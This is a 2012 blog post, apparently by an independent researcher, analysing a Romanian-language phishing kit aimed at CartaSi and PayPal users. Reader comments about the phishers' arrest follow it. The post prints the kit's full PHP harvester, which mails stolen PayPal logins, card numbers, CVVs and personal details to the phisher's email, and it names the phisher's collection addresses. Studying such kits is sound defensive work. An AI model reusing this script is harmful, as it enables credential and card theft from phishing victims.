Monday, April 23, 2012

CartaSi phishing email part 2/2

Behind this phishing emails there are several people or just one guy ?

What i think is that there is only one guy because if you check the title of this script you see the write assembled by ME, if it was a team should be written Assembled by XYZ team.


Where is he from ?

His mother language is romanian and i think he lives in Italy. As you can see below there are several files written in romanian and the stolen information are sent to a fastweb email that you cannot made if you don't leave in Italy.

I was wrong in the previous article saying that the pisher hacked the webstie because was defaced by FERID23 from anti-armenia.org. I suppose that at the end of September 2011 this phisher found it, uploaded a shell and created several folders in this order:
  1. d3b (postepay information stealer)
  2. stf   (cartasi, uk paypal, banca intesa, it paypal, postepay, VISA)
  3. pastote (cartasi, paypal, VISA, bancopostaclick)

Taking a look to pastote folder we see that he uses a mass mailer script to send phishing emails.


The emails address are stored in 30 rar files named pastoteXX.


From 2/3/2012 he started targetting paypal user but using a different method. I don't have any email of paypal phising but for what there is on this site i can guess that he sends an email saying you have received a bonus of 100 euro, in order to proceed login to your paypal (fake link provided) account and fill the form.

When a victim click on the link will be redirected to this fake page on this site.


Once logged in



Once filled the form and clicked send the data are redirected to a script called trimite.php which translated from romanian means send/forward. This time the data aren't stored in a txt file like previous but directly sent to a fastweb email and in the end redirect the victim to the original site.

$username = $_POST['username'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$data = date("l, F d, Y h:i" ,time());
$agent = $_SERVER['HTTP_USER_AGENT'];
$nome = $_POST['nome'];
$cognome = $_POST['cognome'];
$c_tip = $_POST['credit_card_type'];
$cn = $_POST['cc_number'];
$an = $_POST['expdate_year'];
$luna = $_POST['expdate_month'];
$cvv = $_POST['cvv'];
$dob_ziua = $_POST['dob_ziua'];
$dob_luna = $_POST['dob_luna'];
$dob_an = $_POST['dob_an'];

$address1 = $_POST['adresa'];
$zip = $_POST['cod_postal'];
$city = $_POST['oras'];
$state = $_POST['provincie'];

//---Email---//
$email = "--snip--@fastwebmail.it";
$subiect = "$ip:$username:$password";
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

$mesaj_html ="





Indirizzo email $username
Password PayPal $password

Nome $nome
Gnome $cognome
Data di nascita: $dob_ziua:$dob_luna:$dob_an(ziua:luna:an)

Indirizzo $address1
CAP $zip
Città $city
Provincia $state

Tipo di carta di credito $c_tip
Numero della carta di credito $cn
Data di scadenza $luna/$an
Codice di sicurezza della carta $cvv

IP $ip
Data $data
Browser $agent
"; mail($email, $subiect, $mesaj_html, $headers); header("Location: http://www.paypal.it");

He did a good job to replicate paypal login process.

In the stf folder all stolen data are sent to fanemacaz@gmail.com and the techniques used to trick users are the same explained previously.

Folder index file.


Folder content.


That's all for now.

4 comments:

  1. these guys have been arrested in romania

    ReplyDelete
    Replies
    1. Good news. There is any site that report this news ?

      Delete
    2. http://www.opinii.biz/2012/04/george-ariel-boltocgavril-tiberiu.html
      http://www.ziaruldepascani.ro/index.php?option=com_content&view=article&id=2924:romario-mistocar-si-fratii-paiu-arestati-pentru-clonare-de-cardurivideo&catid=17:slider
      http://www.adevarul.ro/locale/iasi/Tinerii_care_furau_bani_de_pe_carduri_si_ii_jucau_la_pariuri_stau_29_de_zile_dupa_gratii_0_691731080.html

      Can you give me an email adress to talk to you in private please?
      Thanks

      Delete
    3. Thank you for the links. I added a box with my email address in the right column of the blog.

      Delete